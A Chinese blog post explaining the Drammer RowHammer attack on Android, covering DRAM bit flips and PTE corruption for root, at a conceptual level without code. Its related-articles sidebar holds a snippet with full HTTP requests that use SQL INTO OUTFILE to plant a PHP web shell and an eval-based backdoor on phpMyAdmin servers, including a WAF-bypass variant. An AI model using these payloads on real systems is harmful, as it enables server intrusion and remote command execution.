通杀所有系统的硬件漏洞?聊一聊Drammer,Android上的RowHammer攻击

最新推荐文章于 2024-12-17 17:31:00 发布
原创 最新推荐文章于 2024-12-17 17:31:00 发布 · 1.2k 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#android #漏洞 #硬件 #Drammer #阿里聚安全

Drammer是一种利用内存芯片设计缺陷的攻击方式,可通过不断访问特定内存地址来翻转其他地址的数据位。该攻击适用于包括Android在内的多个系统,并已成功实现对Android 6.0.1的root权限获取。

通杀所有系统的硬件漏洞?聊一聊Drammer,Android上的RowHammer攻击

大家肯定知道前几天刚爆出来一个linux内核(Android也用的linux内核)的dirtycow漏洞。此洞可以说是个神洞,通过dirtycow,一个普通权限的app可以做到root权限的文件任意写,随后还可以转化为android上的通用root。就在大家纷纷埋头研究dirtycow的时候,Drammer横空出世,号称也可以root最新版的Android 6.0.1,同时还放出了CCS论文POC

那么这个Drammer到底是什么东西呢?

Drammer可以说是一种针对android设备的攻击方式,利用的是内存芯片设计上的一个缺陷。然而,这个问题并不是只出现在Android系统上,而是所有使用内存的系统都会出现这个问题。最早提出这种攻击方式的人是卡内基梅隆大学的Yoongu Kim写的一篇paper -《Flipping Bits in Memory Without Accessing Them: An Experimental Study of DRAM Disturbance Errors》 在这篇文章中,作者提到有个有趣的现象,如果不断的访问两个具有”侵略者”性质的虚拟地址会让一个具有”受害者”性质的内存数据进行位翻转,更神奇的是这个具有”受害者”性质的内存可能会在当前进程可访问的虚拟地址以外

为什么会有这种现象呢?

原因是内存厂商为了能让内存芯片存储更多的数据,于是将内存中的DRAM(The Dynamic Random Access Memory)cell越做越小并且离的越来越近,从而导致相邻的cell在通电的过程中会受到影响。因此,如果我们不断的访问某个位置上的内存,就可能会造成相邻的内存进行位翻转。随后google project zero还通过PC上的linux提权,证明了这种现象的确存在并且可以用来进行攻击(https://googleprojectzero.blogspot.com/2015/03/exploiting-dram-rowhammer-bug-to-gain.html)并将这种攻击方式称为RowHammer。因此,这次出现的drammer是受之前研究的启发,从而实现了Android上的rowhammer攻击,所以drammer全称其实是DRoid and rowhAMMER。

在Android上,整个攻击的基本思路是:1. 先找到用户态可以flush内存的api,比如Android上的ION。2. 然后利用这个api配合上FLIP FENG SHUI技术进行rowhammer攻击。目的是位翻转Page Table Entry (PTE)并让其指向一个攻击者可以控制的内存上。3. 修改PTE从而控制整个物理内存。配合其他漏洞还可以做到远程攻击(DEMO:https://www.vusec.net/projects/drammer/)。

原来硬件上设计的缺陷还会出现这种问题,是不是感觉脑洞已经快要爆炸了。并且这次的攻击与操作系统和软件无关,纯粹是硬件上的漏洞导致的。因此,不光是linux和Android,Windows, OS X和iOS应该也是受影响的。唉,May god bless all electronic devices.

作者:蒸米@阿里移动安全,更多Android、iOS技术文章,请访问阿里聚安全博客
32种针对硬件与固件的漏洞攻击
dian66_ITO的博客
06-28 2713
2018年1月,全球计算机行业因为Meltdown以及Spectre这两个在处理器中存在的新型漏洞而受到威胁。这两个漏洞直接打破了分离内核以及用户内存的OS安全边界。这两个漏洞基于了现代CPU的预测执行功能,而缓解这两个漏洞带来的影响则需要有史以来最大的补丁计划,范围涉及CPU制造商、设备制造商以及操作系统供应商。 Meltdown和Spectre绝不是最早的硬件漏洞,但它们确实引起安全研究者开始注意这种类型的漏洞。从那时开始,许多学术界与私人领域的研究者,都开始研究CPU以及其他硬件组件的低阶运行情况,以
基于OpenGL GPU的Rowhammer攻击
最新发布
hao_wujing的专栏
10-10 608
本文提出了种基于GPU计算着色器的自适应Rowhammer攻击方法,利用GPU的并行处理能力在树莓派4的LPDDR4内存中实现高效的比特翻转。研究采用OpenGL ES 3.1计算着色器,通过随机化访问模式和统计优化绕过现有防御机制(如TRR)。实验结果表明,相比传统CPU方法,GPU并行锤击可获得更高的比特翻转率,证实了异构系统中GPU辅助内存攻击的有效性。该研究揭示了嵌入式设备的安全隐患,并强调了改进内存架构防御机制的必要性。
硬件漏洞有哪些
dongxinddd123的专栏
12-17 428
5. **不安全的反序列化**:反序列化是指将字节流转换为对象的过程,在处理过程中如果缺乏适当的验证机制,可能会导致远程代码执行等严重后果。1. **SQL注入攻击**:这是Web应用中常见的安全漏洞攻击者通过构造特殊的SQL语句,使数据库执行非预期的操作。3. **跨站请求伪造(CSRF)**:攻击者诱导受害者访问个包含恶意请求的网页,利用受害者的身份发起未经授权的请求。3. **固件漏洞**:固件是硬件中的软件,如果存在未修复的漏洞,则可能被黑客利用以控制设备。### 硬件安全漏洞
这种基于硬件攻击 无需软件漏洞和用户许可
weixin_34234721的博客
08-04 233
物理RAM(随机存取存储器)攻击可root安卓及其他设备,攻击者可切实翻转物理存储单元的比特位以入侵移动设备和计算机。 研究人员设计出种安卓设备入侵新方法,不用搞定任何软件漏洞,而是利用RAM芯片的物理设计缺陷。该攻击技术也可影响其他ARM(进阶精简指令集机器)和基于x86芯片的设备和计算机。 该攻击源于过去10年间直在往越来越小的芯片中植入更大DR...
计算机硬件漏洞,剑桥大学学者:透视计算机硬件漏洞
weixin_34379040的博客
07-20 753
幽灵、熔毁、预兆、行锤击、捣乱者——突然之间好像我们可能面临着系统设计危机。对此,我们可以做什么呢?本文中,我们探讨了现有方法是否够用,以及在哪些地方需要投入大量新工作。1 去证明,不要去打补丁现有的许多商业2 深入硬件的背后近年来,我们很清楚地意识到,我们在很多方面都做得还不够。第,处理器硬件(通常要经过广泛的验证)长期以来直被认为是软件的坚实基础,但其自身的漏洞也越来越多。第二,系统由...
找call的万能方法-通杀所有网络游戏.pdf
08-10
"通杀所有网络游戏"的"找call万能方法"实际上是种综合多种方式和渠道,结合有效沟通技巧的策略。这个方法能够极大地提高玩家在游戏中找到合适队友的效率和成功率,从而获得更佳的游戏体验。
精选资源
D3Dhook通杀通杀所有DirectX版本_D3Dhook通杀所有DirectX版本_d3dhook_
09-29
本文将深入探讨D3Dhook的工作原理、实现方式以及它如何通杀所有DirectX版本,包括从Windows XP到Windows 8.1的操作系统。 首先,Direct3D是Microsoft为Windows平台开发的套图形应用程序接口(API),用于创建高...
下载程序最新通杀漏洞入侵工具-易语言
06-13
"下载程序最新通杀漏洞入侵工具" 的描述简洁明了,主要强调这是个用于下载程序的工具,具有广泛适用性,能够针对最新的漏洞进行攻击。这可能是个自动化工具,帮助安全研究人员或者恶意黑客发现并利用目标系统中...
下载程序最新通杀漏洞入侵工具.rar
04-05
下载程序最新通杀漏洞入侵工具.rar 下载程序最新通杀漏洞入侵工具.rar 下载程序最新通杀漏洞入侵工具.rar 下载程序最新通杀漏洞入侵工具.rar 下载程序最新通杀漏洞入侵工具.rar 下载程序最新通杀漏洞入侵工具....
干货 | 记次src通杀漏洞挖掘
2301_80115097的博客
07-25 1487
这里我是有目的地去对某机构或者某学校进行渗透测试漏洞挖掘的,之前在网上看到很多文章说可以直接去edusrc官网的漏洞排行榜上去找,可以去看些开发商排行榜以及某些高校大学的排行榜,里面有很多的该公司或者该学校的漏洞提交情况以及修补情况。
计算机硬件漏洞,震惊了硬件圈子的CPU漏洞,到底是个什么鬼?
weixin_30240765的博客
07-20 1120
原标题:震惊了硬件圈子的CPU漏洞,到底是个什么鬼?这两天如果你关注硬件圈的话,可能会注意到这两天CPU爆出了两个重要漏洞(开始大家以为只有个)。关于这俩漏洞,身边也有人问过橙子君这究竟是个什么鬼?我想说,诶,说对了,有个还真的是鬼——Spectre(冷笑话,翻译梗,不好笑直接往下看)。这些漏洞是啥?原理是啥?这次曝出的这俩漏洞个叫Meltdown,个叫Spectre。Meltdo...
RowHammer 攻击:内存的隐形威胁
sdgfafg_25的博客
03-28 1481
种相对较新的攻击方式,它利用了现代动态随机存取存储器(DRAM)的物理缺陷,这种攻击方式不同于传统的软件漏洞利用,它直接针对硬件的弱点。在操作完成后,行缓冲器内的数据会写入原来的存储单元行之中,同时存储单元中的电容充电。所以,不论是读还是写数据,存储单元都会充放电。在内存如“白菜”价的今天,不改变内存电路板面积大小的前提下,为了能存储更多的数据,只能将存储单元排列的越来越近,密度大幅度增加。如下图所示,第 1、3 行是攻击行,这两行中间是被攻击行,攻击行不停地充放电,中间行大概率会出现比特翻转。
Rowhammer
热门推荐
小二的茶馆
11-09 1万+
Rowhammer比特翻转攻击是指利用临近内存单元之间电子的互相影响,在足够多的访问次数后让某个单元的值从1变成0,反之亦然。这种攻击可以在不访问目标内存区域的前提下使其产生数据错误。 这次的攻击与操作系统和软件无关,纯粹是硬件上的漏洞导致的double-sided/single-sidedDRAM原理理解参考文献: http://wenku.baidu.com/link?url=17FnQIw
DRAM的排锤效应(Row hammer effect )
荷塘阅色
08-28 5361
Row hammer排锤(也写作 rowhammer)是种安全漏洞,它利用动态随机存取存储器 (DRAM) 中的意外和不良副作用,其中存储单元通过泄漏电荷在彼此之间进行电气交互,可能会更改附近的内容在原始内存访问中未寻址的内存行。这种对 DRAM 内存单元之间隔离的规避是现代 DRAM 中高单元密度的结果,并且可以通过特制的内存访问模式来触发,这些模式可以多次快速激活相同的内存行。排锤效应已被用于些计算机安全漏洞提权,并且理论上基于网络的攻击也是可能的。
【论文总结】端对端的方法检测云供应商是否容易受Rowhammer攻击
Ohh24的博客
04-10 407
这是篇来自2020S&P的论文,作者是Lucian Cojocar, Jeremie Kim, Minesh Patel, Lillian Tsai, Stefan Saroiu, Alec Wolman, Onur Mutlu。该论文是从硬件的角度分析云计算安全。
探索硬件漏洞的利器:Drammer 开源项目
gitblog_00083的博客
05-21 537
探索硬件漏洞的利器:Drammer 开源项目 项目介绍 Drammer,这个开源软件是2016年ACM计算机与通信安全(CCS)会议论文“Drammer: Deterministic Rowhammer Attacks on Mobile Devices”的组成部分。它的主要目标是检测Android设备是否受到Rowhammer漏洞的影响。请注意,Drammer并不是用于root设备的工具。 本项...
[知识小节]硬件漏洞CPU漏洞 骑士、熔断、幽灵、预兆漏洞基本情况
网络安全知识分享
10-24 4046
骑士,熔断,幽灵,预兆,四个硬件漏洞基本情况介绍
如何检测 phpMyAdmin 是否存在通杀漏洞
07-25
### 检测 phpMyAdmin 是否存在通杀漏洞的方法 检测 phpMyAdmin 是否存在通杀漏洞(如代码注入漏洞)通常需要结合自动化工具和手动验证手段。以下是些关键的检测方法: #### 1. 版本识别 通过访问 phpMyAdmin 的登录页面或查看响应头信息,识别其版本号。若版本为 4.8.0 或 4.8.1,则可能存在该漏洞。可以通过如下方式识别: ```http GET /phpmyadmin/ HTTP/1.1 Host: target.com ``` 查看响应中的版本信息或页面底部的版本号,确认是否属于受影响版本 [^1]。 #### 2. 使用自动化漏洞扫描工具 可以借助自动化漏洞扫描工具(如 `sqlmap`、`Nuclei`、`Burp Suite` 等)检测 phpMyAdmin 是否存在代码注入漏洞。例如,使用 `Nuclei` 检测 phpMyAdmin 漏洞: ```bash nuclei -u http://target.com/phpmyadmin/ -t ~/nuclei-templates/http/cves/2018/CVE-2018-12613.yaml ``` 该模板专门用于检测 phpMyAdmin 4.8.0/4.8.1 的文件包含漏洞 [^1]。 #### 3. 手动构造恶意请求 通过构造特定的 HTTP 请求,尝试访问 `index.php` 并注入恶意代码。例如: ```http POST /phpmyadmin/index.php?db=malicious_db&table=malicious_table HTTP/1.1 Host: target.com Content-Type: application/x-www-form-urlencoded Content-Length: length token=valid_token&lang=en&server=1 ``` 发送请求后,检查响应中是否包含异常行为,如 `phpinfo()` 输出或文件写入成功的信息 [^1]。 #### 4. 检查文件写入功能 利用漏洞尝试写入 Web Shell 到服务器。例如,构造如下请求: ```http POST /phpmyadmin/index.php?db=malicious_db&table=malicious_table HTTP/1.1 Host: target.com Content-Type: application/x-www-form-urlencoded Content-Length: length token=valid_token&lang=en&server=1&target_lang=en&collation_connection=utf8mb4_unicode_ci&sql_query=SELECT%20%27%3C%3Fphp%20phpinfo%28%29%3B%20%3F%3E%27%20INTO%20OUTFILE%20%27/var/www/html/shell.php%27 ``` 如果服务器成功写入 `shell.php` 文件,并可通过浏览器访问,则表明漏洞存在 [^1]。 #### 5. 日志分析与行为监控 在测试过程中,应启用服务器日志记录,观察是否有异常请求或文件操作行为。例如,检查 Apache 或 Nginx 的访问日志是否包含可疑的 SQL 注入或文件写入请求 [^1]。 #### 6. 安全加固后的检测 若目标系统已进行安全加固(如升级版本、配置 WAF),可尝试绕过机制进行测试。例如,使用编码绕过 WAF 规则,构造如下请求: ```http POST /phpmyadmin/index.php?db=malicious_db&table=malicious_table HTTP/1.1 Host: target.com Content-Type: application/x-www-form-urlencoded Content-Length: length token=valid_token&lang=en&server=1&target_lang=en&collation_connection=utf8mb4_unicode_ci&sql_query=SELECT%20%27%3C%3Fphp%20eval%28%24_POST%5B%27cmd%27%5D%29%3B%20%3F%3E%27%20INTO%20OUTFILE%20%27/var/www/html/backdoor.php%27 ``` 尝试访问 `backdoor.php` 并执行命令,验证是否被 WAF 拦截 。 --- ###
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值